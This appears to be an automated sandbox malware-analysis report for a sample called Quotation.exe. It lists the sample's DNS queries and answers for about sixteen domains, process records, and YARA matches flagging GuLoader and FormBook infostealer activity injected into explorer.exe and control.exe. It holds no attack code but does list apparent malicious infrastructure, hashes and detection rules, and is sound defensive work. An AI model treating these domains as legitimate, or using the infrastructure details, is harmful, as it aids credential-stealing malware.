                                                                                                                        Mar 20, 2023 15:01:26.075973034 CET5134953192.168.11.201.1.1.1
                                                                                                                        Mar 20, 2023 15:01:26.229600906 CET53513491.1.1.1192.168.11.20
                                                                                                                        Mar 20, 2023 15:01:40.322607040 CET5581853192.168.11.201.1.1.1
                                                                                                                        Mar 20, 2023 15:01:40.492297888 CET53558181.1.1.1192.168.11.20
                                                                                                                        Mar 20, 2023 15:01:53.163575888 CET4965453192.168.11.201.1.1.1
                                                                                                                        Mar 20, 2023 15:01:53.478986025 CET53496541.1.1.1192.168.11.20
                                                                                                                        Mar 20, 2023 15:02:07.286457062 CET5755653192.168.11.201.1.1.1
                                                                                                                        Mar 20, 2023 15:02:07.773430109 CET53575561.1.1.1192.168.11.20
                                                                                                                        Mar 20, 2023 15:02:21.642059088 CET5911953192.168.11.201.1.1.1
                                                                                                                        Mar 20, 2023 15:02:21.773844957 CET53591191.1.1.1192.168.11.20
                                                                                                                        Mar 20, 2023 15:02:34.467154980 CET5790253192.168.11.201.1.1.1
                                                                                                                        Mar 20, 2023 15:02:34.487951040 CET53579021.1.1.1192.168.11.20
                                                                                                                        Mar 20, 2023 15:02:49.027229071 CET5792853192.168.11.201.1.1.1
                                                                                                                        Mar 20, 2023 15:02:49.039752960 CET53579281.1.1.1192.168.11.20
                                                                                                                        Mar 20, 2023 15:02:57.088443041 CET5707553192.168.11.201.1.1.1
                                                                                                                        Mar 20, 2023 15:02:57.106502056 CET53570751.1.1.1192.168.11.20
                                                                                                                        Mar 20, 2023 15:03:09.850024939 CET5105453192.168.11.201.1.1.1
                                                                                                                        Mar 20, 2023 15:03:09.895483017 CET53510541.1.1.1192.168.11.20
                                                                                                                        Mar 20, 2023 15:03:23.206232071 CET6325453192.168.11.201.1.1.1
                                                                                                                        Mar 20, 2023 15:03:23.785859108 CET53632541.1.1.1192.168.11.20
                                                                                                                        Mar 20, 2023 15:05:32.255992889 CET5021153192.168.11.201.1.1.1
                                                                                                                        Mar 20, 2023 15:05:32.398036003 CET53502111.1.1.1192.168.11.20
                                                                                                                        Mar 20, 2023 15:05:45.050076008 CET5786253192.168.11.201.1.1.1
                                                                                                                        Mar 20, 2023 15:05:45.096679926 CET53578621.1.1.1192.168.11.20
                                                                                                                        Mar 20, 2023 15:06:00.828131914 CET6377753192.168.11.201.1.1.1
                                                                                                                        Mar 20, 2023 15:06:00.844289064 CET53637771.1.1.1192.168.11.20
                                                                                                                        Mar 20, 2023 15:06:00.844810009 CET6377753192.168.11.209.9.9.9
                                                                                                                        Mar 20, 2023 15:06:01.021074057 CET53637779.9.9.9192.168.11.20
                                                                                                                        Mar 20, 2023 15:06:13.747261047 CET5003453192.168.11.201.1.1.1
                                                                                                                        Mar 20, 2023 15:06:13.762650013 CET53500341.1.1.1192.168.11.20

                                                                                                                        DNS Queries

                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                        Mar 20, 2023 14:59:23.986933947 CET192.168.11.201.1.1.10xa95cStandard query (0)www.wittofitentertainment.comA (IP address)IN (0x0001)false
                                                                                                                        Mar 20, 2023 15:00:57.209255934 CET192.168.11.201.1.1.10x3b51Standard query (0)www.interactive-media.ruA (IP address)IN (0x0001)false
                                                                                                                        Mar 20, 2023 15:01:12.579010010 CET192.168.11.201.1.1.10x2a3aStandard query (0)www.cardinialethanol.comA (IP address)IN (0x0001)false
                                                                                                                        Mar 20, 2023 15:01:26.075973034 CET192.168.11.201.1.1.10xa606Standard query (0)www.flaviosilva.onlineA (IP address)IN (0x0001)false
                                                                                                                        Mar 20, 2023 15:01:40.322607040 CET192.168.11.201.1.1.10x6b08Standard query (0)www.solya-shop.comA (IP address)IN (0x0001)false
                                                                                                                        Mar 20, 2023 15:01:53.163575888 CET192.168.11.201.1.1.10xd39dStandard query (0)www.buymyenergy.comA (IP address)IN (0x0001)false
                                                                                                                        Mar 20, 2023 15:02:07.286457062 CET192.168.11.201.1.1.10xb9b5Standard query (0)www.184411.comA (IP address)IN (0x0001)false
                                                                                                                        Mar 20, 2023 15:02:21.642059088 CET192.168.11.201.1.1.10x2ed3Standard query (0)www.b-tek.mediaA (IP address)IN (0x0001)false
                                                                                                                        Mar 20, 2023 15:02:34.467154980 CET192.168.11.201.1.1.10x63a6Standard query (0)www.dexmart.xyzA (IP address)IN (0x0001)false
                                                                                                                        Mar 20, 2023 15:02:49.027229071 CET192.168.11.201.1.1.10x213fStandard query (0)www.finelinetackdirect.comA (IP address)IN (0x0001)false
                                                                                                                        Mar 20, 2023 15:02:57.088443041 CET192.168.11.201.1.1.10x4754Standard query (0)www.maxhaidt.comA (IP address)IN (0x0001)false
                                                                                                                        Mar 20, 2023 15:03:09.850024939 CET192.168.11.201.1.1.10x800eStandard query (0)www.ghostdyes.netA (IP address)IN (0x0001)false
                                                                                                                        Mar 20, 2023 15:03:23.206232071 CET192.168.11.201.1.1.10x83feStandard query (0)www.aznqmd.comA (IP address)IN (0x0001)false
                                                                                                                        Mar 20, 2023 15:05:32.255992889 CET192.168.11.201.1.1.10xef87Standard query (0)www.texasgent.comA (IP address)IN (0x0001)false
                                                                                                                        Mar 20, 2023 15:05:45.050076008 CET192.168.11.201.1.1.10x7ebStandard query (0)www.brightfms.comA (IP address)IN (0x0001)false
                                                                                                                        Mar 20, 2023 15:06:00.828131914 CET192.168.11.201.1.1.10x337eStandard query (0)www.eta-trader.netA (IP address)IN (0x0001)false
                                                                                                                        Mar 20, 2023 15:06:00.844810009 CET192.168.11.209.9.9.90x337eStandard query (0)www.eta-trader.netA (IP address)IN (0x0001)false
                                                                                                                        Mar 20, 2023 15:06:13.747261047 CET192.168.11.201.1.1.10xa8c8Standard query (0)www.funvacayflorida.comA (IP address)IN (0x0001)false

                                                                                                                        DNS Answers

                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                        Mar 20, 2023 14:59:24.022195101 CET1.1.1.1192.168.11.200xa95cNo error (0)www.wittofitentertainment.com162.240.73.101A (IP address)IN (0x0001)false
                                                                                                                        Mar 20, 2023 15:00:57.344244003 CET1.1.1.1192.168.11.200x3b51No error (0)www.interactive-media.ru88.212.206.251A (IP address)IN (0x0001)false
                                                                                                                        Mar 20, 2023 15:01:12.820903063 CET1.1.1.1192.168.11.200x2a3aNo error (0)www.cardinialethanol.com198.58.118.167A (IP address)IN (0x0001)false
                                                                                                                        Mar 20, 2023 15:01:12.820903063 CET1.1.1.1192.168.11.200x2a3aNo error (0)www.cardinialethanol.com45.33.18.44A (IP address)IN (0x0001)false
                                                                                                                        Mar 20, 2023 15:01:12.820903063 CET1.1.1.1192.168.11.200x2a3aNo error (0)www.cardinialethanol.com45.56.79.23A (IP address)IN (0x0001)false
                                                                                                                        Mar 20, 2023 15:01:12.820903063 CET1.1.1.1192.168.11.200x2a3aNo error (0)www.cardinialethanol.com45.79.19.196A (IP address)IN (0x0001)false
                                                                                                                        Mar 20, 2023 15:01:12.820903063 CET1.1.1.1192.168.11.200x2a3aNo error (0)www.cardinialethanol.com45.33.30.197A (IP address)IN (0x0001)false
                                                                                                                        Mar 20, 2023 15:01:12.820903063 CET1.1.1.1192.168.11.200x2a3aNo error (0)www.cardinialethanol.com72.14.185.43A (IP address)IN (0x0001)false
                                                                                                                        Mar 20, 2023 15:01:12.820903063 CET1.1.1.1192.168.11.200x2a3aNo error (0)www.cardinialethanol.com45.33.20.235A (IP address)IN (0x0001)false
                                                                                                                        Mar 20, 2023 15:01:12.820903063 CET1.1.1.1192.168.11.200x2a3aNo error (0)www.cardinialethanol.com45.33.23.183A (IP address)IN (0x0001)false
                                                                                                                        Mar 20, 2023 15:01:12.820903063 CET1.1.1.1192.168.11.200x2a3aNo error (0)www.cardinialethanol.com45.33.2.79A (IP address)IN (0x0001)false
                                                                                                                        Mar 20, 2023 15:01:12.820903063 CET1.1.1.1192.168.11.200x2a3aNo error (0)www.cardinialethanol.com96.126.123.244A (IP address)IN (0x0001)false
                                                                                                                        Mar 20, 2023 15:01:12.820903063 CET1.1.1.1192.168.11.200x2a3aNo error (0)www.cardinialethanol.com173.255.194.134A (IP address)IN (0x0001)false
                                                                                                                        Mar 20, 2023 15:01:12.820903063 CET1.1.1.1192.168.11.200x2a3aNo error (0)www.cardinialethanol.com72.14.178.174A (IP address)IN (0x0001)false
                                                                                                                        Mar 20, 2023 15:01:26.229600906 CET1.1.1.1192.168.11.200xa606No error (0)www.flaviosilva.onlineflaviosilva.onlineCNAME (Canonical name)IN (0x0001)false
                                                                                                                        Mar 20, 2023 15:01:26.229600906 CET1.1.1.1192.168.11.200xa606No error (0)flaviosilva.online2.57.90.16A (IP address)IN (0x0001)false
                                                                                                                        Mar 20, 2023 15:01:40.492297888 CET1.1.1.1192.168.11.200x6b08No error (0)www.solya-shop.com217.160.0.217A (IP address)IN (0x0001)false
                                                                                                                        Mar 20, 2023 15:01:53.478986025 CET1.1.1.1192.168.11.200xd39dNo error (0)www.buymyenergy.com45.194.145.38A (IP address)IN (0x0001)false
                                                                                                                        Mar 20, 2023 15:02:07.773430109 CET1.1.1.1192.168.11.200xb9b5No error (0)www.184411.combb.zhanghonghong.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                        Mar 20, 2023 15:02:07.773430109 CET1.1.1.1192.168.11.200xb9b5No error (0)bb.zhanghonghong.com154.215.156.6A (IP address)IN (0x0001)false
                                                                                                                        Mar 20, 2023 15:02:21.773844957 CET1.1.1.1192.168.11.200x2ed3No error (0)www.b-tek.media91.184.0.24A (IP address)IN (0x0001)false
                                                                                                                        Mar 20, 2023 15:02:34.487951040 CET1.1.1.1192.168.11.200x63a6No error (0)www.dexmart.xyz199.192.26.35A (IP address)IN (0x0001)false
                                                                                                                        Mar 20, 2023 15:02:49.039752960 CET1.1.1.1192.168.11.200x213fName error (3)www.finelinetackdirect.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                        Mar 20, 2023 15:02:57.106502056 CET1.1.1.1192.168.11.200x4754No error (0)www.maxhaidt.com172.67.212.220A (IP address)IN (0x0001)false
                                                                                                                        Mar 20, 2023 15:02:57.106502056 CET1.1.1.1192.168.11.200x4754No error (0)www.maxhaidt.com104.21.45.96A (IP address)IN (0x0001)false
                                                                                                                        Mar 20, 2023 15:03:09.895483017 CET1.1.1.1192.168.11.200x800eNo error (0)www.ghostdyes.netgcdn0.wixdns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                        Mar 20, 2023 15:03:09.895483017 CET1.1.1.1192.168.11.200x800eNo error (0)gcdn0.wixdns.nettd-ccm-168-233.wixdns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                        Mar 20, 2023 15:03:09.895483017 CET1.1.1.1192.168.11.200x800eNo error (0)td-ccm-168-233.wixdns.net34.117.168.233A (IP address)IN (0x0001)false
                                                                                                                        Mar 20, 2023 15:03:23.785859108 CET1.1.1.1192.168.11.200x83feNo error (0)www.aznqmd.com23.83.160.9A (IP address)IN (0x0001)false
                                                                                                                        Mar 20, 2023 15:05:32.398036003 CET1.1.1.1192.168.11.200xef87No error (0)www.texasgent.com81.17.29.148A (IP address)IN (0x0001)false
                                                                                                                        Mar 20, 2023 15:05:45.096679926 CET1.1.1.1192.168.11.200x7ebNo error (0)www.brightfms.com81.17.18.196A (IP address)IN (0x0001)false
                                                                                                                        Mar 20, 2023 15:06:00.844289064 CET1.1.1.1192.168.11.200x337eServer failure (2)www.eta-trader.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                        Mar 20, 2023 15:06:01.021074057 CET9.9.9.9192.168.11.200x337eNo error (0)www.eta-trader.neteta-trader.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                        Mar 20, 2023 15:06:01.021074057 CET9.9.9.9192.168.11.200x337eNo error (0)eta-trader.net2.57.90.16A (IP address)IN (0x0001)false
                                                                                                                        Mar 20, 2023 15:06:13.762650013 CET1.1.1.1192.168.11.200xa8c8No error (0)www.funvacayflorida.com208.91.197.91A (IP address)IN (0x0001)false

                                                                                                                        HTTP Request Dependency Graph

                                                                                                                        • www.wittofitentertainment.com
                                                                                                                        • www.interactive-media.ru
                                                                                                                        • www.cardinialethanol.com
                                                                                                                        • www.flaviosilva.online
                                                                                                                        • www.solya-shop.com
                                                                                                                        • www.buymyenergy.com
                                                                                                                        • www.184411.com
                                                                                                                        • www.b-tek.media
                                                                                                                        • www.dexmart.xyz
                                                                                                                        • www.maxhaidt.com
                                                                                                                        • www.ghostdyes.net
                                                                                                                        • www.aznqmd.com
                                                                                                                        • www.texasgent.com
                                                                                                                        • www.brightfms.com
                                                                                                                        • www.eta-trader.net
                                                                                                                        • www.funvacayflorida.com

                                                                                                                        Statistics

                                                                                                                        Behavior

                                                                                                                        Click to jump to process

                                                                                                                        System Behavior

                                                                                                                        General

                                                                                                                        Target ID:1
                                                                                                                        Start time:14:58:29
                                                                                                                        Start date:20/03/2023
                                                                                                                        Path:C:\Users\user\Desktop\Quotation.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:C:\Users\user\Desktop\Quotation.exe
                                                                                                                        Imagebase:0x400000
                                                                                                                        File size:693360 bytes
                                                                                                                        MD5 hash:8A81948116D2EA79BEE1D261733DBA89
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Yara matches:
                                                                                                                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.21946690040.00000000050B9000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        Reputation:low

                                                                                                                        General

                                                                                                                        Target ID:10
                                                                                                                        Start time:14:59:17
                                                                                                                        Start date:20/03/2023
                                                                                                                        Path:C:\Users\user\Desktop\Quotation.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:C:\Users\user\Desktop\Quotation.exe
                                                                                                                        Imagebase:0x400000
                                                                                                                        File size:693360 bytes
                                                                                                                        MD5 hash:8A81948116D2EA79BEE1D261733DBA89
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Yara matches:
                                                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.22726446861.0000000000060000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.22726446861.0000000000060000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.22726446861.0000000000060000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.22726706444.0000000000090000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.22726706444.0000000000090000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.22726706444.0000000000090000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                        Reputation:low

                                                                                                                        General

                                                                                                                        Target ID:12
                                                                                                                        Start time:15:00:36
                                                                                                                        Start date:20/03/2023
                                                                                                                        Path:C:\Windows\explorer.exe
                                                                                                                        Wow64 process (32bit):false
                                                                                                                        Commandline:C:\Windows\Explorer.EXE
                                                                                                                        Imagebase:0x7ff764810000
                                                                                                                        File size:4849904 bytes
                                                                                                                        MD5 hash:5EA66FF5AE5612F921BC9DA23BAC95F7
                                                                                                                        Has elevated privileges:false
                                                                                                                        Has administrator privileges:false
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:moderate

                                                                                                                        General

                                                                                                                        Target ID:13
                                                                                                                        Start time:15:00:42
                                                                                                                        Start date:20/03/2023
                                                                                                                        Path:C:\Windows\SysWOW64\control.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:C:\Windows\SysWOW64\control.exe
                                                                                                                        Imagebase:0x5d0000
                                                                                                                        File size:148992 bytes
                                                                                                                        MD5 hash:4DBD69D4C9DA5AAAC731F518EF8EBEA0
                                                                                                                        Has elevated privileges:false
                                                                                                                        Has administrator privileges:false
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Yara matches:
                                                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.26407368880.0000000002F10000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.26407368880.0000000002F10000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.26407368880.0000000002F10000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.26404151531.00000000027A0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.26404151531.00000000027A0000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.26404151531.00000000027A0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.26407116465.0000000002EE0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.26407116465.0000000002EE0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.26407116465.0000000002EE0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                        Reputation:moderate

                                                                                                                        General

                                                                                                                        Target ID:14
                                                                                                                        Start time:15:01:03
                                                                                                                        Start date:20/03/2023
                                                                                                                        Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                        Wow64 process (32bit):false
                                                                                                                        Commandline:C:\Program Files\Mozilla Firefox\Firefox.exe
                                                                                                                        Imagebase:0x7ff752290000
                                                                                                                        File size:597432 bytes
                                                                                                                        MD5 hash:FA9F4FC5D7ECAB5A20BF7A9D1251C851
                                                                                                                        Has elevated privileges:false
                                                                                                                        Has administrator privileges:false
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:moderate

                                                                                                                        General

                                                                                                                        Target ID:17
                                                                                                                        Start time:15:01:09
                                                                                                                        Start date:20/03/2023
                                                                                                                        Path:C:\Windows\System32\WerFault.exe
                                                                                                                        Wow64 process (32bit):false
                                                                                                                        Commandline:C:\Windows\system32\WerFault.exe -u -p 2836 -s 284
                                                                                                                        Imagebase:0x7ff7457d0000
                                                                                                                        File size:568632 bytes
                                                                                                                        MD5 hash:5C06542FED8EE68994D43938E7326D75
                                                                                                                        Has elevated privileges:false
                                                                                                                        Has administrator privileges:false
                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                        Disassembly

                                                                                                                        No disassembly